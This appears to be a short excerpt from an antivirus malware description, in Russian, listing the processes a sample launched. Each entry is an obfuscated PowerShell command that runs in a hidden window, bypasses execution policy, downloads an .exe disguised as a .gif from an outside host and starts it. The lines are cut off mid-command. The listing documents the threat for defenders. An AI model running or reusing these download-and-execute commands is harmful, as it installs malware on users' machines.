Техническая информация
- '<SYSTEM32>\cmd.exe' /C "powerShEll.exe -execuTiONPoLicy bYpASs -nOprOfile -WINDoWStYlE HIddEn (New-objEct sYSTem.nET.WEbclIEnt).downLodfile('http://www.zonedopes.top/red.php?f=1.gif','%ppDT%.ExE');sT...
- '<SYSTEM32>\cmd.exe' /C "powerShEll.exe -execuTiONPoLicy bYpASs -nOprOfile -WINDoWStYlE HIddEn (New-objEct sYSTem.nET.WEbclIEnt).downLodfile('http://www.zonedopes.top/red.php?f=1.gif','%ppDT%.ExE');sT...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -execuTiONPoLicy bYpASs -nOprOfile -WINDoWStYlE HIddEn (New-objEct sYSTem.nET.WEbclIEnt).downLodfile('http://www.zonedopes.top/red.php?f=1.gif','%ppDT%.ExE');sTRT-pROCEss '%AppDAT...